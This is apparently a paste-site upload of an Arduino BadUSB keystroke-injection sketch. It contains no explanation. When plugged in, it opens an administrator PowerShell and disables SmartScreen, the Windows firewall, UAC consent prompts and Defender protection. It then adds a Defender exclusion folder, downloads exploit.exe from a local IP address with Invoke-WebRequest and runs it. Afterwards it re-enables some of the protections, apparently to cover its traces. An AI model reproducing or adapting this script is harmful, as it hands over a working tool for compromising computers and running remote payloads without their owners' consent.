badusb

avatar
unknown
plain_text
3 years ago
5.9 kB
9
Indexable
#include <Keyboard.h>

void setup() {

  Keyboard.begin();
  delay(1000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');

  // Open the Powershell as Administrator
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  //
  delay(1000);
  Keyboard.press(KEY_LEFT_ARROW);
  Keyboard.release(KEY_LEFT_ARROW);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  delay(1000);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('o');
  Keyboard.releaseAll();
  delay(1000);

  // Disabling SmartScreen Filter
  Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"Off\"");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 0");
  typeKey(KEY_RETURN);
  delay(1000);

  // DIsabling Firewall
  delay(1000);
  Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False");
  typeKey(KEY_RETURN);


  //Disabling the UAC
  delay(1500);
  Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 0");
  typeKey(KEY_RETURN);

  delay(1000);
  Keyboard.print("exit");
  typeKey(KEY_RETURN);
  Keyboard.releaseAll();

  //DESACTIVER WINDOWS DEFENDER
  delay(1000);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(1500);

  Keyboard.println("windowsdefender://threat/");  // Ouvre windows defender
  delay(1500);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1000);
  Keyboard.press(KEY_DOWN_ARROW);
  Keyboard.release(KEY_DOWN_ARROW);
  delay(1500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  delay(1000);
  Keyboard.press(32);
  Keyboard.release(32);

  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  Keyboard.releaseAll();


  // Open the Powershell as Administrator

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  //

  delay(1000);
  Keyboard.print("New-Item 'C:\\Program Files\\Dossier_test' -itemType Directory");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Add-MpPreference -ExclusionPath 'C:\\Program Files\\Dossier_test'");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Invoke-WebRequest -Uri 'http://192.168.43.140/exploit.exe' -OutFile 'C:\\Program Files\\Dossier_test\\exploit.exe'");
  typeKey(KEY_RETURN);

  delay(500);
  Keyboard.print("cd 'C:\\Program Files\\Dossier_test\\';.\\exploit.exe");
  typeKey(KEY_RETURN);

  // ACTIVE SMARTSCREEN FILTER

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(1000);
  Keyboard.println("powershell.exe -command start-process powershell -verb runAs");
  delay(10000);

  Keyboard.print("Set-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\" -Name \"SmartScreenEnabled\" -Type String -Value \"On\"");
  typeKey(KEY_RETURN);
  delay(1000);
  Keyboard.print("Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost\" -Name \"EnableWebContentEvaluation\" -Type DWord -Value 1");
  typeKey(KEY_RETURN);
  delay(1000);

  // active Firewall
  delay(1000);
  Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True");
  typeKey(KEY_RETURN);


  //active the UAC
  delay(1500);
  Keyboard.print("Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name ConsentPromptBehaviorAdmin -Value 2");
  typeKey(KEY_RETURN);

  delay(1000);
  Keyboard.print("exit");
  typeKey(KEY_RETURN);
  Keyboard.releaseAll();

  /*////reactive windows defender
    delay(1000);
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press('r');
    Keyboard.releaseAll();
    delay(1500);

    Keyboard.println("windowsdefender://threat/");  // Ouvre windows defender
    delay(1500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW
    );
    delay(500);
    Keyboard.press(KEY_DOWN_ARROW);
    Keyboard.release(KEY_DOWN_ARROW);

    delay(1500);
    Keyboard.press(KEY_RETURN);
    Keyboard.release(KEY_RETURN);

    delay(500);
    Keyboard.press(KEY_LEFT_ARROW);
    Keyboard.release(KEY_LEFT_ARROW);

    delay(1500);
    Keyboard.press(KEY_RETURN);
    Keyboard.release(KEY_RETURN);


    delay(1000);
    Keyboard.press(KEY_LEFT_ALT);
    Keyboard.press(KEY_F4);*/
  Keyboard.releaseAll();

  Keyboard.end();
}

void typeKey(int key) {
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void loop() {}
Editor is loading...